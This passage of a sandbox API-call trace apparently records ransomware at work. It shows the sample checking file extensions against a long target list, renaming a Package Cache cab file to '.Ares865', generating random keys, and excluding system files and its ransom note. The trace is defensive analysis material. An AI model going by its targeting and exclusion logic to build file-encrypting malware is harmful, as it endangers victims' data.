returned 5 [0074.373] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0074.373] lstrlenW (lpString="adb") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0074.373] lstrlenW (lpString="adb") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0074.373] lstrlenW (lpString="ade") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0074.373] lstrlenW (lpString="adf") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0074.373] lstrlenW (lpString="adn") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0074.373] lstrlenW (lpString="adp") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0074.373] lstrlenW (lpString="alf") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0074.373] lstrlenW (lpString="ask") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0074.373] lstrlenW (lpString="btr") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0074.373] lstrlenW (lpString="cat") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0074.373] lstrlenW (lpString="cdb") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0074.373] lstrlenW (lpString="ckp") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0074.373] lstrlenW (lpString="cma") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0074.373] lstrlenW (lpString="cpd") returned 3 [0074.373] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0074.373] lstrlenW (lpString="dacpac") returned 6 [0074.373] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0074.374] lstrlenW (lpString="dad") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0074.374] lstrlenW (lpString="dadiagrams") returned 10 [0074.374] lstrlenW (lpString="daschema") returned 8 [0074.374] lstrlenW (lpString="db-journal") returned 10 [0074.374] lstrlenW (lpString="db-shm") returned 6 [0074.374] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0074.374] lstrlenW (lpString="db-wal") returned 6 [0074.374] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0074.374] lstrlenW (lpString="dbc") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0074.374] lstrlenW (lpString="dbs") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0074.374] lstrlenW (lpString="dbt") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0074.374] lstrlenW (lpString="dbv") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0074.374] lstrlenW (lpString="dbx") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0074.374] lstrlenW (lpString="dcb") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0074.374] lstrlenW (lpString="dct") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0074.374] lstrlenW (lpString="dcx") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0074.374] lstrlenW (lpString="ddl") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0074.374] lstrlenW (lpString="dlis") returned 4 [0074.374] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0074.374] lstrlenW (lpString="dp1") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0074.374] lstrlenW (lpString="dqy") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0074.374] lstrlenW (lpString="dsk") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0074.374] lstrlenW (lpString="dsn") returned 3 [0074.374] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0074.374] lstrlenW (lpString="dtsx") returned 4 [0074.375] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0074.375] lstrlenW (lpString="dxl") returned 3 [0074.375] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0074.375] lstrlenW (lpString="eco") returned 3 [0074.375] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0074.375] lstrlenW (lpString="ecx") returned 3 [0074.375] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0074.375] lstrlenW (lpString="edb") returned 3 [0074.375] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0074.375] lstrlenW (lpString="epim") returned 4 [0074.375] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0074.375] lstrlenW (lpString="fcd") returned 3 [0074.375] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0074.375] lstrlenW (lpString="fdb") returned 3 [0074.375] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0074.376] lstrlenW (lpString="fic") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0074.376] lstrlenW (lpString="flexolibrary") returned 12 [0074.376] lstrlenW (lpString="fm5") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0074.376] lstrlenW (lpString="fmp") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0074.376] lstrlenW (lpString="fmp12") returned 5 [0074.376] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0074.376] lstrlenW (lpString="fmpsl") returned 5 [0074.376] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0074.376] lstrlenW (lpString="fol") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0074.376] lstrlenW (lpString="fp3") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0074.376] lstrlenW (lpString="fp4") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0074.376] lstrlenW (lpString="fp5") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0074.376] lstrlenW (lpString="fp7") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0074.376] lstrlenW (lpString="fpt") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0074.376] lstrlenW (lpString="frm") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0074.376] lstrlenW (lpString="gdb") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0074.376] lstrlenW (lpString="gdb") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0074.376] lstrlenW (lpString="grdb") returned 4 [0074.376] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0074.376] lstrlenW (lpString="gwi") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0074.376] lstrlenW (lpString="hdb") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0074.376] lstrlenW (lpString="his") returned 3 [0074.376] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0074.376] lstrlenW (lpString="ib") returned 2 [0074.377] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0074.377] lstrlenW (lpString="idb") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0074.377] lstrlenW (lpString="ihx") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0074.377] lstrlenW (lpString="itdb") returned 4 [0074.377] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0074.377] lstrlenW (lpString="itw") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0074.377] lstrlenW (lpString="jet") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0074.377] lstrlenW (lpString="jtx") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0074.377] lstrlenW (lpString="kdb") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0074.377] lstrlenW (lpString="kexi") returned 4 [0074.377] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0074.377] lstrlenW (lpString="kexic") returned 5 [0074.377] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0074.377] lstrlenW (lpString="kexis") returned 5 [0074.377] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0074.377] lstrlenW (lpString="lgc") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0074.377] lstrlenW (lpString="lwx") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0074.377] lstrlenW (lpString="maf") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0074.377] lstrlenW (lpString="maq") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0074.377] lstrlenW (lpString="mar") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0074.377] lstrlenW (lpString="marshal") returned 7 [0074.377] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0074.377] lstrlenW (lpString="mas") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0074.377] lstrlenW (lpString="mav") returned 3 [0074.377] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0074.377] lstrlenW (lpString="maw") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0074.378] lstrlenW (lpString="mdbhtml") returned 7 [0074.378] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0074.378] lstrlenW (lpString="mdn") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0074.378] lstrlenW (lpString="mdt") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0074.378] lstrlenW (lpString="mfd") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0074.378] lstrlenW (lpString="mpd") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0074.378] lstrlenW (lpString="mrg") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0074.378] lstrlenW (lpString="mud") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0074.378] lstrlenW (lpString="mwb") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0074.378] lstrlenW (lpString="myd") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0074.378] lstrlenW (lpString="ndf") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0074.378] lstrlenW (lpString="nnt") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0074.378] lstrlenW (lpString="nrmlib") returned 6 [0074.378] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0074.378] lstrlenW (lpString="ns2") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0074.378] lstrlenW (lpString="ns3") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0074.378] lstrlenW (lpString="ns4") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0074.378] lstrlenW (lpString="nsf") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0074.378] lstrlenW (lpString="nv") returned 2 [0074.378] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0074.378] lstrlenW (lpString="nv2") returned 3 [0074.378] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0074.378] lstrlenW (lpString="nwdb") returned 4 [0074.379] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0074.379] lstrlenW (lpString="nyf") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0074.379] lstrlenW (lpString="odb") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0074.379] lstrlenW (lpString="odb") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0074.379] lstrlenW (lpString="oqy") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0074.379] lstrlenW (lpString="ora") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0074.379] lstrlenW (lpString="orx") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0074.379] lstrlenW (lpString="owc") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0074.379] lstrlenW (lpString="p96") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0074.379] lstrlenW (lpString="p97") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0074.379] lstrlenW (lpString="pan") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0074.379] lstrlenW (lpString="pdb") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0074.379] lstrlenW (lpString="pdm") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0074.379] lstrlenW (lpString="pnz") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0074.379] lstrlenW (lpString="qry") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0074.379] lstrlenW (lpString="qvd") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0074.379] lstrlenW (lpString="rbf") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0074.379] lstrlenW (lpString="rctd") returned 4 [0074.379] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0074.379] lstrlenW (lpString="rod") returned 3 [0074.379] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0074.379] lstrlenW (lpString="rodx") returned 4 [0074.380] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0074.380] lstrlenW (lpString="rpd") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0074.380] lstrlenW (lpString="rsd") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0074.380] lstrlenW (lpString="sas7bdat") returned 8 [0074.380] lstrlenW (lpString="sbf") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0074.380] lstrlenW (lpString="scx") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0074.380] lstrlenW (lpString="sdb") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0074.380] lstrlenW (lpString="sdc") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0074.380] lstrlenW (lpString="sdf") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0074.380] lstrlenW (lpString="sis") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0074.380] lstrlenW (lpString="spq") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0074.380] lstrlenW (lpString="te") returned 2 [0074.380] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0074.380] lstrlenW (lpString="teacher") returned 7 [0074.380] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0074.380] lstrlenW (lpString="tmd") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0074.380] lstrlenW (lpString="tps") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0074.380] lstrlenW (lpString="trc") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0074.380] lstrlenW (lpString="trc") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0074.380] lstrlenW (lpString="trm") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0074.380] lstrlenW (lpString="udb") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0074.380] lstrlenW (lpString="udl") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0074.380] lstrlenW (lpString="usr") returned 3 [0074.380] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0074.381] lstrlenW (lpString="v12") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0074.381] lstrlenW (lpString="vis") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0074.381] lstrlenW (lpString="vpd") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0074.381] lstrlenW (lpString="vvv") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0074.381] lstrlenW (lpString="wdb") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0074.381] lstrlenW (lpString="wmdb") returned 4 [0074.381] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0074.381] lstrlenW (lpString="wrk") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0074.381] lstrlenW (lpString="xdb") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0074.381] lstrlenW (lpString="xld") returned 3 [0074.381] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0074.381] lstrlenW (lpString="xmlff") returned 5 [0074.381] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0074.381] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865") returned 129 [0074.381] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0074.383] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.383] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=821681) returned 1 [0074.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0074.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0074.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0074.383] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0074.384] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0074.384] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.384] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc8cc0, lpName=0x0) returned 0x120 [0074.386] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc8cc0) returned 0x2e30000 [0074.446] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0074.447] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0074.447] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0074.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0074.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0074.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0074.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0074.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0074.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0074.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0074.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0074.448] UnmapViewOfFile (lpBaseAddress=0x2e30000) returned 1 [0074.456] CloseHandle (hObject=0x120) returned 1 [0074.456] CloseHandle (hObject=0x118) returned 1 [0074.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0074.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0074.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0074.460] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c14cd00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.460] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.460] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="aoldtz.exe") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="..") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="windows") returned -1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="bootmgr") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="temp") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="pagefile.sys") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="boot") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ids.txt") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ntuser.dat") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="perflogs") returned 1 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="MSBuild") returned 1 [0074.460] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0074.460] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0074.460] lstrcpyW (in: lpString1=0x2cce4e2, lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="vc_runtimeMinimum_x86.msi") returned="vc_runtimeMinimum_x86.msi" [0074.460] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0074.460] lstrlenW (lpString="Ares865") returned 7 [0074.460] lstrcmpiW (lpString1="x86.msi", lpString2="Ares865") returned 1 [0074.460] lstrlenW (lpString=".dll") returned 4 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".dll") returned 1 [0074.460] lstrlenW (lpString=".lnk") returned 4 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".lnk") returned 1 [0074.460] lstrlenW (lpString=".ini") returned 4 [0074.460] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".ini") returned 1 [0074.460] lstrlenW (lpString=".sys") returned 4 [0074.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".sys") returned 1 [0074.461] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0074.461] lstrlenW (lpString="bak") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0074.461] lstrlenW (lpString="ba_") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0074.461] lstrlenW (lpString="dbb") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0074.461] lstrlenW (lpString="vmdk") returned 4 [0074.461] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0074.461] lstrlenW (lpString="rar") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0074.461] lstrlenW (lpString="zip") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0074.461] lstrlenW (lpString="tgz") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0074.461] lstrlenW (lpString="vbox") returned 4 [0074.461] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0074.461] lstrlenW (lpString="vdi") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0074.461] lstrlenW (lpString="vhd") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0074.461] lstrlenW (lpString="vhdx") returned 4 [0074.461] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0074.461] lstrlenW (lpString="avhd") returned 4 [0074.461] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0074.461] lstrlenW (lpString="db") returned 2 [0074.461] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0074.461] lstrlenW (lpString="db2") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0074.461] lstrlenW (lpString="db3") returned 3 [0074.461] lstrcmpiW 